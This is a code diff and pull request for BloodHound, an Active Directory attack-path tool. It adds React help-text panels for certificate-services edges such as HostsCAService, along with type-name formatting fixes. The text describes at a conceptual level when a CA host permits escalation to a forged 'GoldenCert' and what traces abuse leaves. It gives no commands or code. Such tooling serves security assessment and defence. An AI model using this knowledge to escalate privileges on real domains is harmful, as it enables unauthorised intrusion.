+import { FC } from 'react';
+import { typeFormat } from '../utils';
+import { EdgeInfoProps } from '../index';
+import { Typography } from '@mui/material';
+
+const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
+    return (
+        <>
+            <Typography variant='body2'>
+                The {typeFormat(sourceType)} {sourceName} is hosts the enrollment service for the enterprise CA {targetName}.
+            </Typography>
+            <Typography variant='body2'>
+                The Enterprise Certification Authority node is the enrollment service LDAP object for CA hosted on the computer node.
+            </Typography>
+        </>
+    );
+};
+
+export default General;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/General.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/General.tsx
@@ -23,7 +23,7 @@ const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
     return (
         <>
             <Typography variant='body2'>
-                The {typeFormat(sourceType)} {sourceName} is hosts the enrollment service for the enterprise CA {targetName}.
+                The {typeFormat(sourceType)} {sourceName} hosts the enrollment service for the enterprise CA {targetName}.
             </Typography>
             <Typography variant='body2'>
                 The Enterprise Certification Authority node is the enrollment service LDAP object for CA hosted on the computer node.

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/HostsCAService.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/HostsCAService.tsx
@@ -1,0 +1,31 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import General from './General';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
+import Opsec from './Opsec';
+import References from './References';
+
+const HostsCAService = {
+    general: General,
+    windowsAbuse: WindowsAbuse,
+    linuxAbuse: LinuxAbuse,
+    opsec: Opsec,
+    references: References,
+};
+
+export default HostsCAService;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/LinuxAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/LinuxAbuse.tsx
@@ -1,0 +1,32 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <Typography variant='body2'>
+            An attacker may perform several attacks that rely on this relationship. This relationship alone is not
+            enough to escalate rights or impersonate other principals. The enterprise CA must chain up to a root CA
+            of the AD forest and it must be trusted for NT authentication in the AD forest for an escalation to be
+            possible. If both conditions are met, BloodHound will generate a GoldenCert edge from the computer node
+            to the domain node. Check if there is an outbound GoldenCert edge from the computer node.
+        </Typography>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/Opsec.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/Opsec.tsx
@@ -1,0 +1,30 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Opsec: FC = () => {
+    return (
+        <Typography variant='body2'>
+            When an attacker abuses a privilege escalation or impersonation primitive that relies on this relationship,
+            it will necessarily result in the issuance of a certificate. A copy of the issued certificate will be saved
+            on the host that issued the certificate.
+        </Typography>
+    );
+};
+
+export default Opsec;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/References.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/References.tsx
@@ -1,0 +1,33 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Link, Box } from '@mui/material';
+
+const References: FC = () => {
+    return (
+        <Box sx={{ overflowX: 'auto' }}>
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf'>
+                https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
+            </Link>
+        </Box>
+    );
+};
+
+export default References;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/WindowsAbuse.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/HostsCAService/WindowsAbuse.tsx
@@ -1,0 +1,32 @@
+// Copyright 2023 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Abuse: FC = () => {
+    return (
+        <Typography variant='body2'>
+            An attacker may perform several attacks that rely on this relationship. This relationship alone is not
+            enough to escalate rights or impersonate other principals. The enterprise CA must chain up to a root CA
+            of the AD forest and it must be trusted for NT authentication in the AD forest for an escalation to be
+            possible. If both conditions are met, BloodHound will generate a GoldenCert edge from the computer node
+            to the domain node. Check if there is an outbound GoldenCert edge from the computer node.
+        </Typography>
+    );
+};
+
+export default Abuse;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
@@ -80,6 +80,7 @@ import GetChanges from './GetChanges/GetChanges';
 import GetChangesAll from './GetChangesAll/GetChangesAll';
 import HasSIDHistory from './HasSIDHistory/HasSIDHistory';
 import HasSession from './HasSession/HasSession';
+import HostsCAService from './HostsCAService/HostsCAService';
 import IssuedSignedBy from './IssuedSignedBy/IssuedSignedBy';
 import MemberOf from './MemberOf/MemberOf';
 import NTAuthStoreFor from './NTAuthStoreFor/NTAuthStoreFor';
@@ -187,6 +188,7 @@ const EdgeInfoComponents = {
     NTAuthStoreFor: NTAuthStoreFor,
     IssuedSignedBy: IssuedSignedBy,
     TrustedForNTAuth: TrustedForNTAuth,
+    HostsCAService: HostsCAService,
 };
 
 export default EdgeInfoComponents;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
@@ -68,6 +68,7 @@ import CanPSRemote from './CanPSRemote/CanPSRemote';
 import CanRDP from './CanRDP/CanRDP';
 import Contains from './Contains/Contains';
 import DCSync from './DCSync/DCSync';
+import DelegatedEnrollmentAgent from './DelegatedEnrollmentAgent/DelegatedEnrollmentAgent';
 import DumpSMSAPassword from './DumpSMSAPassword/DumpSMSAPassword';
 import Enroll from './Enroll/Enroll';
 import EnterpriseCAFor from './EnterpriseCAFor/EnterpriseCAFor';
@@ -189,6 +190,7 @@ const EdgeInfoComponents = {
     IssuedSignedBy: IssuedSignedBy,
     TrustedForNTAuth: TrustedForNTAuth,
     HostsCAService: HostsCAService,
+    DelegatedEnrollmentAgent: DelegatedEnrollmentAgent,
 };
 
 export default EdgeInfoComponents;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
@@ -71,6 +71,7 @@ import DCSync from './DCSync/DCSync';
 import DelegatedEnrollmentAgent from './DelegatedEnrollmentAgent/DelegatedEnrollmentAgent';
 import DumpSMSAPassword from './DumpSMSAPassword/DumpSMSAPassword';
 import Enroll from './Enroll/Enroll';
+import EnrollOnBehalfOf from './EnrollOnBehalfOf/EnrollOnBehalfOf';
 import EnterpriseCAFor from './EnterpriseCAFor/EnterpriseCAFor';
 import ExecuteDCOM from './ExecuteDCOM/ExecuteDCOM';
 import ForceChangePassword from './ForceChangePassword/ForceChangePassword';
@@ -191,6 +192,7 @@ const EdgeInfoComponents = {
     TrustedForNTAuth: TrustedForNTAuth,
     HostsCAService: HostsCAService,
     DelegatedEnrollmentAgent: DelegatedEnrollmentAgent,
+    EnrollOnBehalfOf: EnrollOnBehalfOf,
 };
 
 export default EdgeInfoComponents;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx
@@ -80,6 +80,7 @@ import GenericAll from './GenericAll/GenericAll';
 import GenericWrite from './GenericWrite/GenericWrite';
 import GetChanges from './GetChanges/GetChanges';
 import GetChangesAll from './GetChangesAll/GetChangesAll';
+import GoldenCert from './GoldenCert/GoldenCert';
 import HasSIDHistory from './HasSIDHistory/HasSIDHistory';
 import HasSession from './HasSession/HasSession';
 import HostsCAService from './HostsCAService/HostsCAService';
@@ -193,6 +194,7 @@ const EdgeInfoComponents = {
     HostsCAService: HostsCAService,
     DelegatedEnrollmentAgent: DelegatedEnrollmentAgent,
     EnrollOnBehalfOf: EnrollOnBehalfOf,
+    GoldenCert: GoldenCert,
 };
 
 export default EdgeInfoComponents;

--- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/utils.ts
+++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/utils.ts
@@ -27,6 +27,16 @@ export const typeFormat = (type: string | undefined): string => {
     if (!type) return '';
     if (type === 'GPO' || type === 'OU') {
         return type;
+    } else if (type === 'CertTemplate') {
+        return "certificate template"
+    } else if (type === 'EnterpriseCA') {
+        return "enterprise CA"
+    } else if (type === 'RootCA') {
+        return "root CA"
+    } else if (type === 'NTAuthStore') {
+        return "NTAuth store"
+    } else if (type === 'AIACA') {
+        return "AIA CA"
     } else {
         return type.toLowerCase();
     }


### PR DESCRIPTION
## Description

Help text for the entity panel of the three ADCS edges:
    - HostsCAService
    - DelegatedEnrollmentAgent
    - EnrollOnBehalfOf
    - GoldenCert

Also fixed the display version of the new node type names so {typeFormat(sourceType)} return "certificate template" rather than "certtemplate".

## Motivation and Context

We need help texts for all edges.

## How Has This Been Tested?

Ran it and checked it looked good.

## Screenshots (if appropriate):
![image](https://github.com/SpecterOps/BloodHound/assets/12843299/00fa6e24-36f5-4adf-a5c8-82c4d63c94bd)

![image](https://github.com/SpecterOps/BloodHound/assets/12843299/2870a266-640f-4d4d-87cf-efe1313ef1dc)

![image](https://github.com/SpecterOps/BloodHound/assets/12843299/9d43bb41-c9a8-41f5-9f90-666900deab1f)


## Types of changes

-   [ ] Chore (a change that does not modify the application functionality)
-   [ ] Bug fix (non-breaking change which fixes an issue)
-   [x] New feature (non-breaking change which adds functionality)
-   [ ] Breaking change (fix or feature that would cause existing functionality to change)

## Checklist:

<!--- Go over all the following points, and put an `x` in all the boxes that apply. -->
<!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! -->

-   [ ] Documentation updates are needed, and have been made accordingly.
-   [ ] I have added and/or updated tests to cover my changes.
-   [ ] All new and existing tests passed.
-   [ ] My changes include a database migration.
